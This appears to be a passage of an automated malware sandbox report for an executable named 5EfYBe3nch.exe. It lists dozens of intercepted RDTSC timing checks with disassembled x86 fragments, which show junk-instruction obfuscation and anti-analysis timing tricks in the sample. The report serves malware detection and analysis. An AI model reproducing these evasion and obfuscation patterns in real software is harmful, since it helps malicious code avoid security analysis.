                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: BC13BA second address: BC13C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pushad 0x00000006 jng 00007FD668F2A766h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: BC17C8 second address: BC17CD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: BC17CD second address: BC17F3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FD668F2A76Fh 0x00000008 push edx 0x00000009 pop edx 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e jbe 00007FD668F2A778h 0x00000014 push eax 0x00000015 push edx 0x00000016 jne 00007FD668F2A766h 0x0000001c rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: BC53FC second address: BC5421 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 pop ecx 0x00000008 pushad 0x00000009 jnc 00007FD668F2A63Ch 0x0000000f pushad 0x00000010 jmp 00007FD668F2A63Dh 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: BC4A2F second address: BC4A35 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: BC4B6E second address: BC4B95 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FD668F2A636h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jbe 00007FD668F2A63Ch 0x00000010 popad 0x00000011 jl 00007FD668F2A64Ah 0x00000017 push eax 0x00000018 push edx 0x00000019 pushad 0x0000001a popad 0x0000001b jns 00007FD668F2A636h 0x00000021 rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: BC4E17 second address: BC4E37 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edi 0x00000007 jmp 00007FD668F2A779h 0x0000000c rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: BC4E37 second address: BC4E51 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD668F2A641h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: BC4E51 second address: BC4E74 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FD668F2A775h 0x0000000d jl 00007FD668F2A766h 0x00000013 rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: BC4FBE second address: BC4FCB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jp 00007FD668F2A636h 0x0000000c popad 0x0000000d rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: BC4FCB second address: BC4FE7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD668F2A778h 0x00000009 rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: BC4FE7 second address: BC503D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 jmp 00007FD668F2A646h 0x0000000e pop edx 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007FD668F2A647h 0x00000018 jng 00007FD668F2A64Bh 0x0000001e jmp 00007FD668F2A63Fh 0x00000023 jg 00007FD668F2A636h 0x00000029 rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: BC503D second address: BC5043 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: BC5043 second address: BC504D instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FD668F2A636h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: BC51F8 second address: BC51FC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: BC8141 second address: BC814B instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: BC81CB second address: BC81CF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: BC81CF second address: BC81D3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: BC81D3 second address: BC81D9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: BC81D9 second address: BC822E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD668F2A63Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xor dword ptr [esp], 3CD576CBh 0x00000010 push 00000000h 0x00000012 push edi 0x00000013 call 00007FD668F2A638h 0x00000018 pop edi 0x00000019 mov dword ptr [esp+04h], edi 0x0000001d add dword ptr [esp+04h], 0000001Ch 0x00000025 inc edi 0x00000026 push edi 0x00000027 ret 0x00000028 pop edi 0x00000029 ret 0x0000002a push 36391B88h 0x0000002f push eax 0x00000030 push edx 0x00000031 push eax 0x00000032 push edx 0x00000033 jmp 00007FD668F2A642h 0x00000038 rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: BC822E second address: BC8244 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD668F2A772h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: BC8590 second address: BC8598 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: BC8598 second address: BC859E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: BC859E second address: BC85AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 push ebx 0x00000008 js 00007FD668F2A63Ch 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: BC9134 second address: BC9141 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push edx 0x00000004 pop edx 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: BC9141 second address: BC914E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 jng 00007FD668F2A636h 0x0000000d rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: BCAD83 second address: BCAD89 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: BCAD89 second address: BCAD9F instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jnc 00007FD668F2A636h 0x00000009 pop ecx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 jo 00007FD668F2A636h 0x00000016 rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: BCAD9F second address: BCADC4 instructions: 0x00000000 rdtsc 0x00000002 jc 00007FD668F2A766h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FD668F2A779h 0x00000011 rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: BCCBE7 second address: BCCBFA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD668F2A63Fh 0x00000009 rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: BCCBFA second address: BCCC68 instructions: 0x00000000 rdtsc 0x00000002 jno 00007FD668F2A766h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e pushad 0x0000000f push eax 0x00000010 pop eax 0x00000011 push edx 0x00000012 pop edx 0x00000013 popad 0x00000014 pop eax 0x00000015 nop 0x00000016 push 00000000h 0x00000018 push eax 0x00000019 call 00007FD668F2A768h 0x0000001e pop eax 0x0000001f mov dword ptr [esp+04h], eax 0x00000023 add dword ptr [esp+04h], 0000001Ch 0x0000002b inc eax 0x0000002c push eax 0x0000002d ret 0x0000002e pop eax 0x0000002f ret 0x00000030 sub dword ptr [ebp+122D1E65h], edx 0x00000036 push 00000000h 0x00000038 jmp 00007FD668F2A778h 0x0000003d push 00000000h 0x0000003f pushad 0x00000040 pushad 0x00000041 sub dword ptr [ebp+122D1846h], esi 0x00000047 pushad 0x00000048 popad 0x00000049 popad 0x0000004a popad 0x0000004b xchg eax, ebx 0x0000004c push eax 0x0000004d push edx 0x0000004e pushad 0x0000004f push eax 0x00000050 push edx 0x00000051 rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: BCCC68 second address: BCCC6F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: BCCC6F second address: BCCC74 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: BCD6C7 second address: BCD6CD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: BCD460 second address: BCD47B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FD668F2A771h 0x0000000f rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: BCD47B second address: BCD481 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: BD0AC6 second address: BD0ACC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: BD0ACC second address: BD0AE0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnp 00007FD668F2A63Eh 0x0000000c rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: BD1827 second address: BD182D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: BD1D8F second address: BD1D93 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: BD2DF0 second address: BD2E42 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 nop 0x00000006 mov dword ptr [ebp+122D1CFCh], edi 0x0000000c push 00000000h 0x0000000e push edx 0x0000000f mov di, C267h 0x00000013 pop ebx 0x00000014 push 00000000h 0x00000016 push 00000000h 0x00000018 push esi 0x00000019 call 00007FD668F2A768h 0x0000001e pop esi 0x0000001f mov dword ptr [esp+04h], esi 0x00000023 add dword ptr [esp+04h], 0000001Bh 0x0000002b inc esi 0x0000002c push esi 0x0000002d ret 0x0000002e pop esi 0x0000002f ret 0x00000030 mov edi, 1B0B2FFBh 0x00000035 xchg eax, esi 0x00000036 push eax 0x00000037 push edx 0x00000038 jmp 00007FD668F2A771h 0x0000003d rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: BD1FC6 second address: BD1FD0 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FD668F2A63Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: BD5031 second address: BD5035 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: BD5035 second address: BD50AC instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c push edi 0x0000000d jmp 00007FD668F2A642h 0x00000012 pop edi 0x00000013 nop 0x00000014 mov ebx, 53D3E4E3h 0x00000019 push dword ptr fs:[00000000h] 0x00000020 and edi, dword ptr [ebp+1247704Eh] 0x00000026 mov dword ptr fs:[00000000h], esp 0x0000002d mov eax, dword ptr [ebp+122D08C5h] 0x00000033 mov bx, 1C14h 0x00000037 push FFFFFFFFh 0x00000039 push 00000000h 0x0000003b push edx 0x0000003c call 00007FD668F2A638h 0x00000041 pop edx 0x00000042 mov dword ptr [esp+04h], edx 0x00000046 add dword ptr [esp+04h], 00000015h 0x0000004e inc edx 0x0000004f push edx 0x00000050 ret 0x00000051 pop edx 0x00000052 ret 0x00000053 push eax 0x00000054 push ecx 0x00000055 pushad 0x00000056 jmp 00007FD668F2A63Fh 0x0000005b push eax 0x0000005c push edx 0x0000005d rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: BD6BF9 second address: BD6C08 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 jo 00007FD668F2A770h 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: BD6C08 second address: BD6C61 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 nop 0x00000008 xor ebx, 17AC3D45h 0x0000000e push 00000000h 0x00000010 xor dword ptr [ebp+122D1CBEh], esi 0x00000016 push 00000000h 0x00000018 push 00000000h 0x0000001a push eax 0x0000001b call 00007FD668F2A638h 0x00000020 pop eax 0x00000021 mov dword ptr [esp+04h], eax 0x00000025 add dword ptr [esp+04h], 0000001Bh 0x0000002d inc eax 0x0000002e push eax 0x0000002f ret 0x00000030 pop eax 0x00000031 ret 0x00000032 mov di, dx 0x00000035 pushad 0x00000036 mov edx, dword ptr [ebp+122D2714h] 0x0000003c or ebx, dword ptr [ebp+122D1812h] 0x00000042 popad 0x00000043 cld 0x00000044 push eax 0x00000045 push eax 0x00000046 push edx 0x00000047 pushad 0x00000048 jne 00007FD668F2A636h 0x0000004e push eax 0x0000004f push edx 0x00000050 rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: BD6C61 second address: BD6C66 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: BD6EBF second address: BD6EC5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: BD7EAB second address: BD7EAF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: BD6EC5 second address: BD6EF4 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FD668F2A63Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jbe 00007FD668F2A64Ch 0x00000013 jmp 00007FD668F2A646h 0x00000018 rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: BD8D7D second address: BD8D82 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: BD6EF4 second address: BD6EFA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: BD6EFA second address: BD6EFE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: BDABF7 second address: BDAC01 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jp 00007FD668F2A636h 0x0000000a rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: BDAC01 second address: BDAC5E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a push edx 0x0000000b jc 00007FD668F2A766h 0x00000011 pop edx 0x00000012 ja 00007FD668F2A768h 0x00000018 popad 0x00000019 nop 0x0000001a mov dword ptr [ebp+122D2298h], ecx 0x00000020 push 00000000h 0x00000022 movzx ebx, ax 0x00000025 push 00000000h 0x00000027 ja 00007FD668F2A769h 0x0000002d xchg eax, esi 0x0000002e jmp 00007FD668F2A771h 0x00000033 push eax 0x00000034 pushad 0x00000035 jmp 00007FD668F2A774h 0x0000003a push edx 0x0000003b push eax 0x0000003c push edx 0x0000003d rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: BDCDAA second address: BDCDBC instructions: 0x00000000 rdtsc 0x00000002 jc 00007FD668F2A63Ah 0x00000008 pushad 0x00000009 popad 0x0000000a pushad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: BDCDBC second address: BDCDC0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: BDE526 second address: BDE531 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop eax 0x00000006 push eax 0x00000007 pushad 0x00000008 push edi 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: BDE531 second address: BDE53A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 pop eax 0x00000009 rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: BDE53A second address: BDE53E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: BDE757 second address: BDE75E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: BDE75E second address: BDE780 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jmp 00007FD668F2A646h 0x00000008 pop edx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: BDE780 second address: BDE784 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: BE3E7E second address: BE3EE2 instructions: 0x00000000 rdtsc 0x00000002 jp 00007FD668F2A63Ch 0x00000008 ja 00007FD668F2A636h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 mov dword ptr [esp], eax 0x00000013 cmc 0x00000014 push 00000000h 0x00000016 push 00000000h 0x00000018 push edi 0x00000019 call 00007FD668F2A638h 0x0000001e pop edi 0x0000001f mov dword ptr [esp+04h], edi 0x00000023 add dword ptr [esp+04h], 0000001Ah 0x0000002b inc edi 0x0000002c push edi 0x0000002d ret 0x0000002e pop edi 0x0000002f ret 0x00000030 mov edi, 0D2434DCh 0x00000035 push 00000000h 0x00000037 mov dword ptr [ebp+122D1D44h], esi 0x0000003d mov dword ptr [ebp+1244AEBBh], ebx 0x00000043 xchg eax, esi 0x00000044 js 00007FD668F2A642h 0x0000004a jg 00007FD668F2A63Ch 0x00000050 push eax 0x00000051 push edx 0x00000052 push eax 0x00000053 push edx 0x00000054 push eax 0x00000055 push edx 0x00000056 rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: BE3EE2 second address: BE3EE6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: BECB95 second address: BECBA1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007FD668F2A63Eh 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: BF07E1 second address: BF080F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 mov eax, dword ptr [esp+04h] 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e jnc 00007FD668F2A766h 0x00000014 jmp 00007FD668F2A779h 0x00000019 popad 0x0000001a rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: BF080F second address: BF0826 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FD668F2A642h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: BF8CA7 second address: BF8CC3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD668F2A778h 0x00000009 rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: BF8CC3 second address: BF8CC7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: BF8298 second address: BF82BD instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FD668F2A779h 0x00000008 jno 00007FD668F2A766h 0x0000000e jmp 00007FD668F2A76Dh 0x00000013 push eax 0x00000014 push edx 0x00000015 je 00007FD668F2A766h 0x0000001b pushad 0x0000001c popad 0x0000001d rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: BF82BD second address: BF82C7 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FD668F2A636h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: BF8450 second address: BF845D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 jg 00007FD668F2A76Eh 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: BF8599 second address: BF85A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007FD668F2A636h 0x0000000a rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: BF85A3 second address: BF85B8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a jmp 00007FD668F2A76Bh 0x0000000f rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: BF85B8 second address: BF85C0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: B7D250 second address: B7D264 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 jng 00007FD668F2A766h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e js 00007FD668F2A766h 0x00000014 rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: BC6AF2 second address: BC6AF8 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: BC6AF8 second address: BC6B11 instructions: 0x00000000 rdtsc 0x00000002 js 00007FD668F2A768h 0x00000008 push edi 0x00000009 pop edi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 jbe 00007FD668F2A766h 0x00000016 push ebx 0x00000017 pop ebx 0x00000018 popad 0x00000019 rdtsc
